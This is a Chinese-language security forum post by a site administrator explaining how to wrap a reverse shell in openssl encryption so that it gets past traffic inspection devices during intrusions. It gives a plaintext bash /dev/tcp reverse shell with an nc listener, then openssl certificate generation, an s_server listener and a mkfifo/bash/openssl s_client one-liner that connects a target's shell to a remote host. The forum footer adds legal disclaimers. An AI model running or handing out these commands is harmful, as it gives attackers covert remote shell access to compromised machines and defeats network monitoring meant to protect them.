搜索
查看: 2201|回复: 0

利用openssl加密你的shell

[复制链接]

598

主题

876

帖子

2234

积分

管理员

本论坛第一帅

Rank: 9Rank: 9Rank: 9

积分
2234

热心会员推广达人宣传达人突出贡献优秀版主荣誉管理论坛元老

QQ
发表于 2019-9-7 14:39:28 来自手机 | 显示全部楼层 |阅读模式
在我们实际的渗透测试过程中,总是有各种各样的流量审查设备挡住我们通往system的道路,尤其是在反弹shell的时候,明文传输的shell总是容易断,那么本文介绍一种利用openssl反弹流量加密的shell来绕过流量审查设备。

常规bash反弹
vps执行 nc -lvvp 4444

目标主机执行 bash -i >& /dev/tcp/172.16.1.1/4444 0>&1



流量明文传输,很容易被拦截。

openssl加密传输
第一步,在vps上生成SSL证书的公钥/私钥对

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

第二步,在VPS监听反弹shell

openssl s_server -quiet -key key.pem -cert cert.pem -port 4433

第三步,在目标上用openssl加密反弹shell的流量

mkfifo /tmp/s;/bin/bash -i < /tmp/s 2>&1|openssl s_client -quiet -connect vps:443 > /tmp/s;rm /tmp/s

20190826132310

流量已经被加密。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

温馨提示
1:发帖请遵守《中华人民共和国网络安全法》,发帖内容不得维护国家的、集体的、个人的利益。
2:请勿发布恶意攻击他人的技术文章、工具、和使用教程,发现后删帖处理。
3:本站的目的在于让更多的人了解网络安全,避免受到他人的恶意攻击。
4:本站中的部分文章,可能会出现一些“技术类手段”,但这仅仅为学习演示所用,而非恶意传播技术。
5:本站中的部分文章,可能转载自互联网。如有侵权行为,联系我们删除即可。
6:学习仅是充实头脑,切勿恶意攻击个人、企业等。所造成的法律后果一切由自己承担,本站及其站长概不负责。
朕知道了
快速回复 返回顶部 返回列表